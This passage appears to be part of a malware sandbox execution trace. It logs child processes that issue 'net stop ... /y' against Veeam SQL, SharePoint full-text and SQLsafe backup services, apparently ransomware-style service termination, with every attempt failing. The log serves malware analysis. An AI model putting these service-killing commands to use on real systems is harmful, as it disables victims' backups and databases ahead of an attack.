_String2="MSSQL$VEEAMSQL2008R2") returned 10 [0218.358] _wcsicmp (_String1="wksta", _String2="MSSQL$VEEAMSQL2008R2") returned 10 [0218.358] _wcsicmp (_String1="prdr", _String2="MSSQL$VEEAMSQL2008R2") returned 3 [0218.358] _wcsicmp (_String1="devrdr", _String2="MSSQL$VEEAMSQL2008R2") returned -9 [0218.358] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQL$VEEAMSQL2008R2") returned -1 [0218.358] _wcsicmp (_String1="server", _String2="MSSQL$VEEAMSQL2008R2") returned 6 [0218.358] _wcsicmp (_String1="svr", _String2="MSSQL$VEEAMSQL2008R2") returned 6 [0218.358] _wcsicmp (_String1="srv", _String2="MSSQL$VEEAMSQL2008R2") returned 6 [0218.358] _wcsicmp (_String1="lanmanserver", _String2="MSSQL$VEEAMSQL2008R2") returned -1 [0218.358] _wcsicmp (_String1="alerter", _String2="MSSQL$VEEAMSQL2008R2") returned -12 [0218.358] _wcsicmp (_String1="netlogon", _String2="MSSQL$VEEAMSQL2008R2") returned 1 [0218.359] _wcsupr (in: _String="MSSQL$VEEAMSQL2008R2" | out: _String="MSSQL$VEEAMSQL2008R2") returned="MSSQL$VEEAMSQL2008R2" [0218.359] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x3f54f0 [0218.361] GetServiceKeyNameW (in: hSCManager=0x3f54f0, lpDisplayName="MSSQL$VEEAMSQL2008R2", lpServiceName=0xc3aaf0, lpcchBuffer=0x32fd1c | out: lpServiceName="", lpcchBuffer=0x32fd1c) returned 0 [0218.362] _wcsicmp (_String1="msg", _String2="MSSQL$VEEAMSQL2008R2") returned -12 [0218.362] _wcsicmp (_String1="messenger", _String2="MSSQL$VEEAMSQL2008R2") returned -14 [0218.362] _wcsicmp (_String1="receiver", _String2="MSSQL$VEEAMSQL2008R2") returned 5 [0218.362] _wcsicmp (_String1="rcv", _String2="MSSQL$VEEAMSQL2008R2") returned 5 [0218.362] _wcsicmp (_String1="redirector", _String2="MSSQL$VEEAMSQL2008R2") returned 5 [0218.362] _wcsicmp (_String1="redir", _String2="MSSQL$VEEAMSQL2008R2") returned 5 [0218.362] _wcsicmp (_String1="rdr", _String2="MSSQL$VEEAMSQL2008R2") returned 5 [0218.362] _wcsicmp (_String1="workstation", _String2="MSSQL$VEEAMSQL2008R2") returned 10 [0218.362] _wcsicmp (_String1="work", _String2="MSSQL$VEEAMSQL2008R2") returned 10 [0218.362] _wcsicmp (_String1="wksta", _String2="MSSQL$VEEAMSQL2008R2") returned 10 [0218.362] _wcsicmp (_String1="prdr", _String2="MSSQL$VEEAMSQL2008R2") returned 3 [0218.362] _wcsicmp (_String1="devrdr", _String2="MSSQL$VEEAMSQL2008R2") returned -9 [0218.362] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQL$VEEAMSQL2008R2") returned -1 [0218.362] _wcsicmp (_String1="server", _String2="MSSQL$VEEAMSQL2008R2") returned 6 [0218.362] _wcsicmp (_String1="svr", _String2="MSSQL$VEEAMSQL2008R2") returned 6 [0218.362] _wcsicmp (_String1="srv", _String2="MSSQL$VEEAMSQL2008R2") returned 6 [0218.362] _wcsicmp (_String1="lanmanserver", _String2="MSSQL$VEEAMSQL2008R2") returned -1 [0218.362] _wcsicmp (_String1="alerter", _String2="MSSQL$VEEAMSQL2008R2") returned -12 [0218.362] _wcsicmp (_String1="netlogon", _String2="MSSQL$VEEAMSQL2008R2") returned 1 [0218.362] NetServiceControl (in: servername=0x0, service="MSSQL$VEEAMSQL2008R2", opcode=0x0, arg=0x0, bufptr=0x32fd18 | out: bufptr=0x32fd18) returned 0x889 [0218.363] wcscpy_s (in: _Destination=0xc3a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0218.363] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a80000 [0218.364] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74a80000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xc3b338, nSize=0x800, Arguments=0xc39dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0218.365] GetFileType (hFile=0x26c) returned 0x3 [0218.365] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x3f4020 [0218.365] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x3f4020, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n>", lpUsedDefaultChar=0x0) returned 30 [0218.365] WriteFile (in: hFile=0x26c, lpBuffer=0x3f4020, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x32fc58, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x32fc58, lpOverlapped=0x0) returned 0 [0218.365] LocalFree (hMem=0x3f4020) returned 0x0 [0218.365] GetFileType (hFile=0x26c) returned 0x3 [0218.365] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x3f62c8 [0218.365] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x3f62c8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n?", lpUsedDefaultChar=0x0) returned 2 [0218.365] WriteFile (in: hFile=0x26c, lpBuffer=0x3f62c8, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x32fc58, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x32fc58, lpOverlapped=0x0) returned 0 [0218.365] LocalFree (hMem=0x3f62c8) returned 0x0 [0218.365] _ultow (in: _Dest=0x889, _Radix=3341448 | out: _Dest=0x889) returned="2185" [0218.365] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74a80000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xc3b338, nSize=0x800, Arguments=0xc39dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0218.366] GetFileType (hFile=0x26c) returned 0x3 [0218.366] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x3f62c8 [0218.366] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x3f62c8, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0218.366] WriteFile (in: hFile=0x26c, lpBuffer=0x3f62c8, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x32fc64, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x32fc64, lpOverlapped=0x0) returned 0 [0218.366] LocalFree (hMem=0x3f62c8) returned 0x0 [0218.366] GetFileType (hFile=0x26c) returned 0x3 [0218.366] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x3f62c8 [0218.366] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x3f62c8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n?", lpUsedDefaultChar=0x0) returned 2 [0218.366] WriteFile (in: hFile=0x26c, lpBuffer=0x3f62c8, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x32fc64, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x32fc64, lpOverlapped=0x0) returned 0 [0218.366] LocalFree (hMem=0x3f62c8) returned 0x0 [0218.366] NetApiBufferFree (Buffer=0x3f1c80) returned 0x0 [0218.367] NetApiBufferFree (Buffer=0x3f1c98) returned 0x0 [0218.367] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQL$VEEAMSQL2008R2 /y" [0218.367] exit (_Code=2) Process: id = "378" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x5e275000" os_pid = "0x844" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop MSSQLFDLauncher$SHAREPOINT /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 553 os_tid = 0x864 Process: id = "379" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x60e39000" os_pid = "0x41c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "378" os_parent_pid = "0x844" cmd_line = "C:\\Windows\\system32\\net1 stop MSSQLFDLauncher$SHAREPOINT /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 554 os_tid = 0x4f0 [0218.508] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x30f830 | out: lpSystemTimeAsFileTime=0x30f830*(dwLowDateTime=0x4b6da460, dwHighDateTime=0x1d57a87)) [0218.508] GetCurrentProcessId () returned 0x41c [0218.508] GetCurrentThreadId () returned 0x4f0 [0218.508] GetTickCount () returned 0x11702a0 [0218.508] QueryPerformanceCounter (in: lpPerformanceCount=0x30f828 | out: lpPerformanceCount=0x30f828*=33879244927) returned 1 [0218.508] GetModuleHandleA (lpModuleName=0x0) returned 0x7f0000 [0218.508] __set_app_type (_Type=0x1) [0218.508] __p__fmode () returned 0x74eb31f4 [0218.508] __p__commode () returned 0x74eb31fc [0218.508] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7fffe6) returned 0x0 [0218.508] __getmainargs (in: _Argc=0x809064, _Argv=0x80906c, _Env=0x809068, _DoWildCard=0, _StartInfo=0x809024 | out: _Argc=0x809064, _Argv=0x80906c, _Env=0x809068) returned 0 [0218.509] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0218.509] GetConsoleOutputCP () returned 0x1b5 [0218.509] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x809080 | out: lpCPInfo=0x809080) returned 1 [0218.509] SetThreadUILanguage (LangId=0x0) returned 0x409 [0218.512] sprintf_s (in: _DstBuf=0x30f7e8, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0218.512] setlocale (category=0, locale=".437") returned="English_United States.437" [0218.514] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0218.514] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0218.514] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQLFDLauncher$SHAREPOINT /y" [0218.514] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x30f5b4, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0218.514] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x0, Size=0x88) returned 0x3e4c00 [0218.514] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0218.515] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x30f7b8 | out: Buffer=0x30f7b8*=0x3e1c98) returned 0x0 [0218.515] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x30f7b8 | out: Buffer=0x30f7b8*=0x3e1cb0) returned 0x0 [0218.515] _fileno (_File=0x74eb2900) returned -2 [0218.515] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0218.515] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0218.515] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0218.515] _wcsicmp (_String1="config", _String2="stop") returned -16 [0218.515] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0218.515] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0218.515] _wcsicmp (_String1="file", _String2="stop") returned -13 [0218.515] _wcsicmp (_String1="files", _String2="stop") returned -13 [0218.515] _wcsicmp (_String1="group", _String2="stop") returned -12 [0218.515] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0218.515] _wcsicmp (_String1="help", _String2="stop") returned -11 [0218.515] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0218.515] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0218.515] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0218.515] _wcsicmp (_String1="session", _String2="stop") returned -15 [0218.515] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0218.515] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0218.515] _wcsicmp (_String1="share", _String2="stop") returned -12 [0218.515] _wcsicmp (_String1="start", _String2="stop") returned -14 [0218.515] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0218.515] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0218.515] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0218.515] _wcsicmp (_String1="accounts", _String2="MSSQLFDLauncher$SHAREPOINT") returned -12 [0218.515] _wcsicmp (_String1="computer", _String2="MSSQLFDLauncher$SHAREPOINT") returned -10 [0218.515] _wcsicmp (_String1="config", _String2="MSSQLFDLauncher$SHAREPOINT") returned -10 [0218.515] _wcsicmp (_String1="continue", _String2="MSSQLFDLauncher$SHAREPOINT") returned -10 [0218.515] _wcsicmp (_String1="cont", _String2="MSSQLFDLauncher$SHAREPOINT") returned -10 [0218.515] _wcsicmp (_String1="file", _String2="MSSQLFDLauncher$SHAREPOINT") returned -7 [0218.515] _wcsicmp (_String1="files", _String2="MSSQLFDLauncher$SHAREPOINT") returned -7 [0218.516] _wcsicmp (_String1="group", _String2="MSSQLFDLauncher$SHAREPOINT") returned -6 [0218.516] _wcsicmp (_String1="groups", _String2="MSSQLFDLauncher$SHAREPOINT") returned -6 [0218.516] _wcsicmp (_String1="help", _String2="MSSQLFDLauncher$SHAREPOINT") returned -5 [0218.516] _wcsicmp (_String1="helpmsg", _String2="MSSQLFDLauncher$SHAREPOINT") returned -5 [0218.516] _wcsicmp (_String1="localgroup", _String2="MSSQLFDLauncher$SHAREPOINT") returned -1 [0218.516] _wcsicmp (_String1="pause", _String2="MSSQLFDLauncher$SHAREPOINT") returned 3 [0218.516] _wcsicmp (_String1="session", _String2="MSSQLFDLauncher$SHAREPOINT") returned 6 [0218.516] _wcsicmp (_String1="sessions", _String2="MSSQLFDLauncher$SHAREPOINT") returned 6 [0218.516] _wcsicmp (_String1="sess", _String2="MSSQLFDLauncher$SHAREPOINT") returned 6 [0218.516] _wcsicmp (_String1="share", _String2="MSSQLFDLauncher$SHAREPOINT") returned 6 [0218.516] _wcsicmp (_String1="start", _String2="MSSQLFDLauncher$SHAREPOINT") returned 6 [0218.516] _wcsicmp (_String1="stats", _String2="MSSQLFDLauncher$SHAREPOINT") returned 6 [0218.516] _wcsicmp (_String1="statistics", _String2="MSSQLFDLauncher$SHAREPOINT") returned 6 [0218.516] _wcsicmp (_String1="stop", _String2="MSSQLFDLauncher$SHAREPOINT") returned 6 [0218.516] _wcsicmp (_String1="time", _String2="MSSQLFDLauncher$SHAREPOINT") returned 7 [0218.516] _wcsicmp (_String1="user", _String2="MSSQLFDLauncher$SHAREPOINT") returned 8 [0218.516] _wcsicmp (_String1="users", _String2="MSSQLFDLauncher$SHAREPOINT") returned 8 [0218.516] _wcsicmp (_String1="msg", _String2="MSSQLFDLauncher$SHAREPOINT") returned -12 [0218.516] _wcsicmp (_String1="messenger", _String2="MSSQLFDLauncher$SHAREPOINT") returned -14 [0218.516] _wcsicmp (_String1="receiver", _String2="MSSQLFDLauncher$SHAREPOINT") returned 5 [0218.516] _wcsicmp (_String1="rcv", _String2="MSSQLFDLauncher$SHAREPOINT") returned 5 [0218.516] _wcsicmp (_String1="netpopup", _String2="MSSQLFDLauncher$SHAREPOINT") returned 1 [0218.516] _wcsicmp (_String1="redirector", _String2="MSSQLFDLauncher$SHAREPOINT") returned 5 [0218.516] _wcsicmp (_String1="redir", _String2="MSSQLFDLauncher$SHAREPOINT") returned 5 [0218.516] _wcsicmp (_String1="rdr", _String2="MSSQLFDLauncher$SHAREPOINT") returned 5 [0218.516] _wcsicmp (_String1="workstation", _String2="MSSQLFDLauncher$SHAREPOINT") returned 10 [0218.516] _wcsicmp (_String1="work", _String2="MSSQLFDLauncher$SHAREPOINT") returned 10 [0218.516] _wcsicmp (_String1="wksta", _String2="MSSQLFDLauncher$SHAREPOINT") returned 10 [0218.516] _wcsicmp (_String1="prdr", _String2="MSSQLFDLauncher$SHAREPOINT") returned 3 [0218.516] _wcsicmp (_String1="devrdr", _String2="MSSQLFDLauncher$SHAREPOINT") returned -9 [0218.516] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQLFDLauncher$SHAREPOINT") returned -1 [0218.516] _wcsicmp (_String1="server", _String2="MSSQLFDLauncher$SHAREPOINT") returned 6 [0218.516] _wcsicmp (_String1="svr", _String2="MSSQLFDLauncher$SHAREPOINT") returned 6 [0218.516] _wcsicmp (_String1="srv", _String2="MSSQLFDLauncher$SHAREPOINT") returned 6 [0218.516] _wcsicmp (_String1="lanmanserver", _String2="MSSQLFDLauncher$SHAREPOINT") returned -1 [0218.516] _wcsicmp (_String1="alerter", _String2="MSSQLFDLauncher$SHAREPOINT") returned -12 [0218.516] _wcsicmp (_String1="netlogon", _String2="MSSQLFDLauncher$SHAREPOINT") returned 1 [0218.517] _wcsupr (in: _String="MSSQLFDLauncher$SHAREPOINT" | out: _String="MSSQLFDLAUNCHER$SHAREPOINT") returned="MSSQLFDLAUNCHER$SHAREPOINT" [0218.517] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x3e54d8 [0218.519] GetServiceKeyNameW (in: hSCManager=0x3e54d8, lpDisplayName="MSSQLFDLAUNCHER$SHAREPOINT", lpServiceName=0x80aaf0, lpcchBuffer=0x30f754 | out: lpServiceName="", lpcchBuffer=0x30f754) returned 0 [0218.520] _wcsicmp (_String1="msg", _String2="MSSQLFDLAUNCHER$SHAREPOINT") returned -12 [0218.520] _wcsicmp (_String1="messenger", _String2="MSSQLFDLAUNCHER$SHAREPOINT") returned -14 [0218.520] _wcsicmp (_String1="receiver", _String2="MSSQLFDLAUNCHER$SHAREPOINT") returned 5 [0218.520] _wcsicmp (_String1="rcv", _String2="MSSQLFDLAUNCHER$SHAREPOINT") returned 5 [0218.520] _wcsicmp (_String1="redirector", _String2="MSSQLFDLAUNCHER$SHAREPOINT") returned 5 [0218.520] _wcsicmp (_String1="redir", _String2="MSSQLFDLAUNCHER$SHAREPOINT") returned 5 [0218.520] _wcsicmp (_String1="rdr", _String2="MSSQLFDLAUNCHER$SHAREPOINT") returned 5 [0218.520] _wcsicmp (_String1="workstation", _String2="MSSQLFDLAUNCHER$SHAREPOINT") returned 10 [0218.520] _wcsicmp (_String1="work", _String2="MSSQLFDLAUNCHER$SHAREPOINT") returned 10 [0218.520] _wcsicmp (_String1="wksta", _String2="MSSQLFDLAUNCHER$SHAREPOINT") returned 10 [0218.520] _wcsicmp (_String1="prdr", _String2="MSSQLFDLAUNCHER$SHAREPOINT") returned 3 [0218.520] _wcsicmp (_String1="devrdr", _String2="MSSQLFDLAUNCHER$SHAREPOINT") returned -9 [0218.520] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQLFDLAUNCHER$SHAREPOINT") returned -1 [0218.520] _wcsicmp (_String1="server", _String2="MSSQLFDLAUNCHER$SHAREPOINT") returned 6 [0218.520] _wcsicmp (_String1="svr", _String2="MSSQLFDLAUNCHER$SHAREPOINT") returned 6 [0218.520] _wcsicmp (_String1="srv", _String2="MSSQLFDLAUNCHER$SHAREPOINT") returned 6 [0218.520] _wcsicmp (_String1="lanmanserver", _String2="MSSQLFDLAUNCHER$SHAREPOINT") returned -1 [0218.520] _wcsicmp (_String1="alerter", _String2="MSSQLFDLAUNCHER$SHAREPOINT") returned -12 [0218.520] _wcsicmp (_String1="netlogon", _String2="MSSQLFDLAUNCHER$SHAREPOINT") returned 1 [0218.520] NetServiceControl (in: servername=0x0, service="MSSQLFDLAUNCHER$SHAREPOINT", opcode=0x0, arg=0x0, bufptr=0x30f750 | out: bufptr=0x30f750) returned 0x889 [0218.521] wcscpy_s (in: _Destination=0x80a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0218.521] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a10000 [0218.522] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74a10000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x80b338, nSize=0x800, Arguments=0x809dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0218.523] GetFileType (hFile=0x26c) returned 0x3 [0218.523] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x3e3ca8 [0218.523] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x3e3ca8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0218.523] WriteFile (in: hFile=0x26c, lpBuffer=0x3e3ca8, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x30f690, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x30f690, lpOverlapped=0x0) returned 0 [0218.523] LocalFree (hMem=0x3e3ca8) returned 0x0 [0218.523] GetFileType (hFile=0x26c) returned 0x3 [0218.523] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x3e62a0 [0218.523] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x3e62a0, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n>", lpUsedDefaultChar=0x0) returned 2 [0218.523] WriteFile (in: hFile=0x26c, lpBuffer=0x3e62a0, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x30f690, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x30f690, lpOverlapped=0x0) returned 0 [0218.523] LocalFree (hMem=0x3e62a0) returned 0x0 [0218.523] _ultow (in: _Dest=0x889, _Radix=3208896 | out: _Dest=0x889) returned="2185" [0218.523] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74a10000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x80b338, nSize=0x800, Arguments=0x809dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0218.523] GetFileType (hFile=0x26c) returned 0x3 [0218.523] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x3e62a0 [0218.523] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x3e62a0, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0218.523] WriteFile (in: hFile=0x26c, lpBuffer=0x3e62a0, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x30f69c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x30f69c, lpOverlapped=0x0) returned 0 [0218.523] LocalFree (hMem=0x3e62a0) returned 0x0 [0218.523] GetFileType (hFile=0x26c) returned 0x3 [0218.523] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x3e62a0 [0218.523] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x3e62a0, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n>", lpUsedDefaultChar=0x0) returned 2 [0218.524] WriteFile (in: hFile=0x26c, lpBuffer=0x3e62a0, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x30f69c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x30f69c, lpOverlapped=0x0) returned 0 [0218.524] LocalFree (hMem=0x3e62a0) returned 0x0 [0218.524] NetApiBufferFree (Buffer=0x3e1c98) returned 0x0 [0218.524] NetApiBufferFree (Buffer=0x3e1cb0) returned 0x0 [0218.524] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQLFDLauncher$SHAREPOINT /y" [0218.524] exit (_Code=2) Process: id = "380" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x53a7a000" os_pid = "0x8d8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop ΓÇ£SQLsafe Filter ServiceΓÇ¥ /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 555 os_tid = 0x890 Process: id = "381" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x518e0000" os_pid = "0x86c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "380" os_parent_pid = "0x8d8" cmd_line = "C:\\Windows\\system32\\net1 stop ΓÇ£SQLsafe Filter ServiceΓÇ¥ /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 556 os_tid = 0x840 [0218.672] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1dfa8c | out: lpSystemTimeAsFileTime=0x1dfa8c*(dwLowDateTime=0x4b87d380, dwHighDateTime=0x1d57a87)) [0218.672] GetCurrentProcessId () returned 0x86c [0218.672] GetCurrentThreadId () returned 0x840 [0218.672] GetTickCount () returned 0x117034c [0218.672] QueryPerformanceCounter (in: lpPerformanceCount=0x1dfa84 | out: lpPerformanceCount=0x1dfa84*=33895692510) returned 1 [0218.673] GetModuleHandleA (lpModuleName=0x0) returned 0xea0000 [0218.673] __set_app_type (_Type=0x1) [0218.673] __p__fmode () returned 0x74eb31f4 [0218.673] __p__commode () returned 0x74eb31fc [0218.673] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xeaffe6) returned 0x0 [0218.673] __getmainargs (in: _Argc=0xeb9064, _Argv=0xeb906c, _Env=0xeb9068, _DoWildCard=0, _StartInfo=0xeb9024 | out: _Argc=0xeb9064, _Argv=0xeb906c, _Env=0xeb9068) returned 0 [0218.673] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0218.673] GetConsoleOutputCP () returned 0x1b5 [0218.673] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xeb9080 | out: lpCPInfo=0xeb9080) returned 1 [0218.673] SetThreadUILanguage (LangId=0x0) returned 0x409 [0218.676] sprintf_s (in: _DstBuf=0x1dfa44, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0218.676] setlocale (category=0, locale=".437") returned="English_United States.437" [0218.679] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0218.679] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0218.679] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop ΓÇ£SQLsafe Filter ServiceΓÇ¥ /y" [0218.679] GetModuleFileNameW (in: hModule=0x0, 